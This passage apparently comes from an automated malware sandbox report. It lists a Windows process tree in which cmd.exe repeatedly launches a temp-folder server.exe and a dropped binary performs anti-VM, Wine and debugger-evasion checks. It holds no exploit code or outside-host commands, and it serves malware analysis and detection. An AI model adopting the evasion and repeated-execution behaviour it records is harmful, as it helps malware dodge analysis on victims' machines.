  2⤵
  PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6924
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2328
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5104
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2260
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:988
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1100
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6800
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6688

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5652
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7116
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3668
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:700
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5696
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6580
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3680
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6148
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{30d13f77-bf84-4b4a-b8f3-01a96a97b2f2}\f7950cf4-afce-4fa5-a046-b7a79fa2d2ab.cmd"
1⤵
PID:4960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4772
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6076
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2156
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6316
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6436
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3808
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1240
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:7096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5700
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3176
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3776
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3692
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2292
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:392
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6048
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3672 -ip 3672
1⤵
PID:5128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2112
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4256
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2992
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4588
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2708
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7056
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6504

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6588
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6564
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4908
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4388
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3480
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2704
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7100
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7024
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2900
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4532
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6668
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6436
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4928

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
1⤵
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6796
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:376
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:796
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4320
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6952
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1896
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6924
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3588
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6040
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2332
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1192
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6480
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1492
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1308
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7156
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4600
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6728
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4708
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6852
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5960
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6528
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4772
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:7148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5600
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6180
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:7140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2136
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2568
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1340
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3384
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:184
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6104
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7080
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4000
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4172
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5340
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6588
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2328
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:7028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4232
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5772
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6040
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6988
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5096
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:7112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1660
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:960
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6780
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6176
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2396
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1328
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6100
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6632
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:3756

C:\Windows\system32\cmd.exe
